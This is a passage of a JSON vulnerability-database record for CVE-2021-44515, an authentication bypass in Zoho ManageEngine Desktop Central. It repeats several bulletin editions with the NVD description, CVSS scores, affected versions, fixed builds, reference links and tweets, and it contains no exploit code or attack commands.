"https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "refsource": "CONFIRM", "tags": []}]}, "lastseen": "2021-12-16T17:55:36", "differentElements": ["affectedSoftware", "cpe", "cpe23", "cpeConfiguration", "cvss", "cvss2", "cvss3", "cwe", "extraReferences", "modified"], "edition": 4}, {"bulletin": {"id": "CVE-2021-44515", "vendorId": null, "hash": "ef3259d039a75fd744dba86cda6e391a", "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-44515", "description": "Zoho ManageEngine Desktop Central is vulnerable to authentication bypass, leading to remote code execution on the server, as exploited in the wild in December 2021. For Enterprise builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For Enterprise builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3. For MSP builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For MSP builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3.", "published": "2021-12-12T05:15:00", "modified": "2021-12-16T14:16:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 10.0}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-44515", "reporter": "cve@mitre.org", "references": ["https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html"], "cvelist": ["CVE-2021-44515"], "immutableFields": [], "lastseen": "2021-12-16T18:25:32", "history": [], "viewCount": 22, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}, {"type": "nessus", "idList": ["MANAGEENGINE_DESKTOP_CENTRAL_10_1_2137_3.NASL"]}, {"type": "cisa", "idList": ["CISA:C9AC32BB051B58B7F0F6E0FD2949390C", "CISA:380E63A9EAAD85FA1950A6973017E11B"]}, {"type": "thn", "idList": ["THN:DB8E18C57AFB9EEEFDABD840FBF5D938"]}, {"type": "hivepro", "idList": ["HIVEPRO:C7C4C4FD6D71992EA2AF88F0ECFBD280"]}], "modified": "2021-12-14T08:36:42", "rev": 2}, "exploitation": {"wildExploited": true, "wildExploitedSources": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}], "modified": "2021-12-14T08:36:42"}, "score": {"value": 2.7, "vector": "NONE", "modified": "2021-12-14T08:36:42", "rev": 2}, "twitter": {"counter": 4, "tweets": [{"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}], "modified": "2021-12-14T08:36:42"}}, "objectVersion": "1.6", "cpe": ["cpe:/a:zohocorp:manageengine_desktop_central:10.1.2137.3"], "cpe23": ["cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2137.3:*:*:*:enterprise:*:*:*"], "cwe": ["CWE-287"], "affectedSoftware": [{"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2127.18", "operator": "lt", "name": "zohocorp manageengine desktop central"}, {"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2127.18", "operator": "lt", "name": "zohocorp manageengine desktop central"}, {"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2137.3", "operator": "lt", "name": "zohocorp manageengine desktop central"}, {"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2137.3", "operator": "le", "name": "zohocorp manageengine desktop central"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2127.18:*:*:*:enterprise:*:*:*", "versionEndExcluding": "10.1.2127.18", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2127.18:*:*:*:managed_service_providers:*:*:*", "versionEndExcluding": "10.1.2127.18", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2137.3:*:*:*:managed_service_providers:*:*:*", "versionStartIncluding": "10.1.2128.0", "versionEndExcluding": "10.1.2137.3", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2137.3:*:*:*:enterprise:*:*:*", "versionStartIncluding": "10.1.2128.0", "versionEndIncluding": "10.1.2137.3", "cpe_name": []}]}]}, "extraReferences": [{"url": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "name": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "refsource": "CONFIRM", "tags": ["Issue Tracking", "Vendor Advisory"]}, {"url": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "name": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "refsource": "MISC", "tags": ["Third Party Advisory", "US Government Resource"]}, {"url": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "name": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "refsource": "CONFIRM", "tags": ["Exploit", "Patch", "Vendor Advisory"]}]}, "lastseen": "2021-12-16T18:25:32", "differentElements": ["affectedSoftware", "cpe", "cpe23", "cpeConfiguration", "cvss", "cvss2", "cvss3", "cwe", "extraReferences", "modified"], "edition": 5}, {"bulletin": {"id": "CVE-2021-44515", "vendorId": null, "hash": "68d9bafd6b120bb5f87bb11033a1b946", "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-44515", "description": "Zoho ManageEngine Desktop Central is vulnerable to authentication bypass, leading to remote code execution on the server, as exploited in the wild in December 2021. For Enterprise builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For Enterprise builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3. For MSP builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For MSP builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3.", "published": "2021-12-12T05:15:00", "modified": "2021-12-13T13:01:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-44515", "reporter": "cve@mitre.org", "references": ["https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html"], "cvelist": ["CVE-2021-44515"], "immutableFields": [], "lastseen": "2021-12-16T18:25:42", "history": [], "viewCount": 22, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}, {"type": "nessus", "idList": ["MANAGEENGINE_DESKTOP_CENTRAL_10_1_2137_3.NASL"]}, {"type": "cisa", "idList": ["CISA:C9AC32BB051B58B7F0F6E0FD2949390C", "CISA:380E63A9EAAD85FA1950A6973017E11B"]}, {"type": "thn", "idList": ["THN:DB8E18C57AFB9EEEFDABD840FBF5D938"]}, {"type": "hivepro", "idList": ["HIVEPRO:C7C4C4FD6D71992EA2AF88F0ECFBD280"]}], "modified": "2021-12-14T08:36:42", "rev": 2}, "exploitation": {"wildExploited": true, "wildExploitedSources": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}], "modified": "2021-12-14T08:36:42"}, "score": {"value": 2.7, "vector": "NONE", "modified": "2021-12-14T08:36:42", "rev": 2}, "twitter": {"counter": 4, "tweets": [{"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}], "modified": "2021-12-14T08:36:42"}}, "objectVersion": "1.6", "cpe": [], "cpe23": [], "cwe": [], "affectedSoftware": [], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": []}, "extraReferences": [{"url": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "name": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "refsource": "CONFIRM", "tags": []}, {"url": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "name": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "refsource": "MISC", "tags": []}, {"url": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "name": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "refsource": "CONFIRM", "tags": []}]}, "lastseen": "2021-12-16T18:25:42", "differentElements": ["affectedSoftware", "cpe", "cpe23", "cpeConfiguration", "cvss", "cvss2", "cvss3", "cwe", "extraReferences", "modified"], "edition": 6}, {"bulletin": {"id": "CVE-2021-44515", "vendorId": null, "hash": "ef3259d039a75fd744dba86cda6e391a", "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-44515", "description": "Zoho ManageEngine Desktop Central is vulnerable to authentication bypass, leading to remote code execution on the server, as exploited in the wild in December 2021. For Enterprise builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For Enterprise builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3. For MSP builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For MSP builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3.", "published": "2021-12-12T05:15:00", "modified": "2021-12-16T14:16:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 10.0}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-44515", "reporter": "cve@mitre.org", "references": ["https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html"], "cvelist": ["CVE-2021-44515"], "immutableFields": [], "lastseen": "2021-12-16T18:55:32", "history": [], "viewCount": 22, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}, {"type": "nessus", "idList": ["MANAGEENGINE_DESKTOP_CENTRAL_10_1_2137_3.NASL"]}, {"type": "cisa", "idList": ["CISA:C9AC32BB051B58B7F0F6E0FD2949390C", "CISA:380E63A9EAAD85FA1950A6973017E11B"]}, {"type": "thn", "idList": ["THN:DB8E18C57AFB9EEEFDABD840FBF5D938"]}, {"type": "hivepro", "idList": ["HIVEPRO:C7C4C4FD6D71992EA2AF88F0ECFBD280"]}], "modified": "2021-12-14T08:36:42", "rev": 2}, "exploitation": {"wildExploited": true, "wildExploitedSources": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}], "modified": "2021-12-14T08:36:42"}, "score": {"value": 2.7, "vector": "NONE", "modified": "2021-12-14T08:36:42", "rev": 2}, "twitter": {"counter": 4, "tweets": [{"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}], "modified": "2021-12-14T08:36:42"}}, "objectVersion": "1.6", "cpe": ["cpe:/a:zohocorp:manageengine_desktop_central:10.1.2137.3"], "cpe23": ["cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2137.3:*:*:*:enterprise:*:*:*"], "cwe": ["CWE-287"], "affectedSoftware": [{"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2127.18", "operator": "lt", "name": "zohocorp manageengine desktop central"}, {"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2127.18", "operator": "lt", "name": "zohocorp manageengine desktop central"}, {"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2137.3", "operator": "lt", "name": "zohocorp manageengine desktop central"}, {"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2137.3", "operator": "le", "name": "zohocorp manageengine desktop central"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2127.18:*:*:*:enterprise:*:*:*", "versionEndExcluding": "10.1.2127.18", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2127.18:*:*:*:managed_service_providers:*:*:*", "versionEndExcluding": "10.1.2127.18", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2137.3:*:*:*:managed_service_providers:*:*:*", "versionStartIncluding": "10.1.2128.0", "versionEndExcluding": "10.1.2137.3", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2137.3:*:*:*:enterprise:*:*:*", "versionStartIncluding": "10.1.2128.0", "versionEndIncluding": "10.1.2137.3", "cpe_name": []}]}]}, "extraReferences": [{"url": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "name": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "refsource": "CONFIRM", "tags": ["Issue Tracking", "Vendor Advisory"]}, {"url": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "name": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "refsource": "MISC", "tags": ["Third Party Advisory", "US Government Resource"]}, {"url": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "name": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "refsource": "CONFIRM", "tags": ["Exploit", "Patch", "Vendor Advisory"]}]}, "lastseen": "2021-12-16T18:55:32", "differentElements": ["affectedSoftware", "cpe", "cpe23", "cpeConfiguration", "cvss", "cvss2", "cvss3", "cwe", "extraReferences", "modified"], "edition": 7}, {"bulletin": {"id": "CVE-2021-44515", "vendorId": null, "hash": "68d9bafd6b120bb5f87bb11033a1b946", "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-44515", "description": "Zoho ManageEngine Desktop Central is vulnerable to authentication bypass, leading to remote code execution on the server, as exploited in the wild in December 2021. For Enterprise builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For Enterprise builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3. For MSP builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For MSP builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3.", "published": "2021-12-12T05:15:00", "modified": "2021-12-13T13:01:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-44515", "reporter": "cve@mitre.org", "references": ["https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html"], "cvelist": ["CVE-2021-44515"], "immutableFields": [], "lastseen": "2021-12-16T18:55:42", "history": [], "viewCount": 23, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}, {"type": "nessus", "idList": ["MANAGEENGINE_DESKTOP_CENTRAL_10_1_2137_3.NASL"]}, {"type": "cisa", "idList": ["CISA:C9AC32BB051B58B7F0F6E0FD2949390C", "CISA:380E63A9EAAD85FA1950A6973017E11B"]}, {"type": "thn", "idList": ["THN:DB8E18C57AFB9EEEFDABD840FBF5D938"]}, {"type": "hivepro", "idList": ["HIVEPRO:C7C4C4FD6D71992EA2AF88F0ECFBD280"]}], "modified": "2021-12-14T08:36:42", "rev": 2}, "exploitation": {"wildExploited": true, "wildExploitedSources": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}], "modified": "2021-12-16T18:55:42"}, "score": {"value": 2.7, "vector": "NONE", "modified": "2021-12-14T08:36:42", "rev": 2}, "twitter": {"counter": 4, "tweets": [{"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}], "modified": "2021-12-14T08:36:42"}}, "objectVersion": "1.6", "cpe": [], "cpe23": [], "cwe": [], "affectedSoftware": [], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": []}, "extraReferences": [{"url": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "name": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "refsource": "CONFIRM", "tags": []}, {"url": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "name": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "refsource": "MISC", "tags": []}, {"url": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "name": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "refsource": "CONFIRM", "tags": []}]}, "lastseen": "2021-12-16T18:55:42", "differentElements": ["affectedSoftware", "cpe", "cpe23", "cpeConfiguration", "cvss", "cvss2", "cvss3", "cwe", "extraReferences", "modified"], "edition": 8}, {"bulletin": {"id": "CVE-2021-44515", "vendorId": null, "hash": "ef3259d039a75fd744dba86cda6e391a", "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-44515", "description": "Zoho ManageEngine Desktop Central is vulnerable to authentication bypass, leading to remote code execution on the server, as exploited in the wild in December 2021. For Enterprise builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For Enterprise builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3. For MSP builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For MSP builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3.", "published": "2021-12-12T05:15:00", "modified": "2021-12-16T14:16:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 10.0}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-44515", "reporter": "cve@mitre.org", "references": ["https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html"], "cvelist": ["CVE-2021-44515"], "immutableFields": [], "lastseen": "2021-12-16T19:25:33", "history": [], "viewCount": 23, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}, {"type": "nessus", "idList": ["MANAGEENGINE_DESKTOP_CENTRAL_10_1_2137_3.NASL"]}, {"type": "cisa", "idList": ["CISA:C9AC32BB051B58B7F0F6E0FD2949390C", "CISA:380E63A9EAAD85FA1950A6973017E11B"]}, {"type": "thn", "idList": ["THN:DB8E18C57AFB9EEEFDABD840FBF5D938"]}, {"type": "hivepro", "idList": ["HIVEPRO:C7C4C4FD6D71992EA2AF88F0ECFBD280"]}], "modified": "2021-12-14T08:36:42", "rev": 2}, "exploitation": {"wildExploited": true, "wildExploitedSources": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}], "modified": "2021-12-16T18:55:42"}, "score": {"value": 2.7, "vector": "NONE", "modified": "2021-12-14T08:36:42", "rev": 2}, "twitter": {"counter": 4, "tweets": [{"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": 